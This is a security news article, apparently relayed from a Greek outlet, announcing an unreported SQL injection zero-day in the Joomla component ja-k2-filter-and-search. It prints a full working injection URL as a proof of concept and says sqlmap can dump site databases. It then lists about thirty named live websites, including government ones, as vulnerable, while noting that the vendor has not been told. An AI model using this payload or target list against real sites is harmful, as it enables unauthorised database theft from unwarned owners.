Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

SQL Injection zero-day in component ja-k2-filter-and-search of Joomla

Information Security experts have discovered an SQL injection zero-day vulnerability in Joomla component ja-k2-filter-and-search. Information Security Researchers Dimitrios Roussis and Evangelos Apostoloudis have discovered an SQL injection vulnerability in component ja-k2-filter-and-search (https://www.joomlart.com/joomla/extensions/ja-k2-search) of Joomla, a popular open-source Content Management System (CMS). This component has been used in various Joomla sites. Through the use of the […]

SQL Injection zero-day in component ja-k2-filter-and-search of Joomla

Information Security experts have discovered an SQL injection zero-day vulnerability in Joomla component ja-k2-filter-and-search.

Information Security Researchers Dimitrios Roussis and Evangelos Apostoloudis have discovered an SQL injection vulnerability in component ja-k2-filter-and-search (https://www.joomlart.com/joomla/extensions/ja-k2-search) of Joomla, a popular open-source Content Management System (CMS).

This component has been used in various Joomla sites. Through the use of the sqlmap tool a malicious user is able to gain access to the website database revealing very critical or sensitive data in some cases

This vulnerability has not been yet detected or published in any international website. In addition, the component developer has not been informed about this critical issue so that all well-known databases are updated. Therefore this vulnerability is considered as a zero-day.

Proof of Concept

Any joomla website making use of the particular component can be checked for this vulnerability through the following request.

(WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27

As a result, the following error message is displayed proving the presence of vulnerability.

ja-k2-filter-and-search-joomla-flaw

By using the Sqlmap and the given URL it is evident that a dump of the database can be achieved.

List of  Vulnerable Sites

http://www.active-business.gr/

http://www.aquariancladding.co.uk/

http://www.arhitektura.mrt.gov.me/

http://www.athenian-yachts.gr

http://www.bathroom-shop.gr/

http://www.beactive.cy/

http://www.bowmansales.com/

http://www.cmvcapanema.pr.gov.br/

http://www.dao-bzh.org/

http://www.edeskati.gr/

http://www.gardeshgar-ir.com/

http://www.getravel.gr/

http://www.gndr.org/

http://www.holiday116.ru/

http://www.html-template.ru/

http://www.igctravel.co.uk/

http://www.international-nightlife.com/

http://www.internationalweddinginstitute.com/

http://www.kidsland-nsk.ru/

http://www.kingstonrv.com/

http://www.l-proekt.com/

http://www.mauritanie-online.com/

http://www.mice.ru/

http://www.nchasia.com/

http://www.ohg-bensberg.de/

http://www.rustyoptical.com/

http://www.seam.gr/

http://www.sherdoust.ir/

http://www.tasteofedm.ca/

http://www.transitec.net/

http://www.usasciencefestival.org/

https://proyectostipo.dnp.gov.co

https://www.lvivrada.gov.ua/

https://www.lvivrada.gov.ua/

https://www.moriel.org/

Below the original post in greek language published by SecNews.gr

https://secnews.gr/149262/joomla-ja-k2-filter-and-search-zero-day/

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – ja-k2-filter-and-search zero-day , Joomla)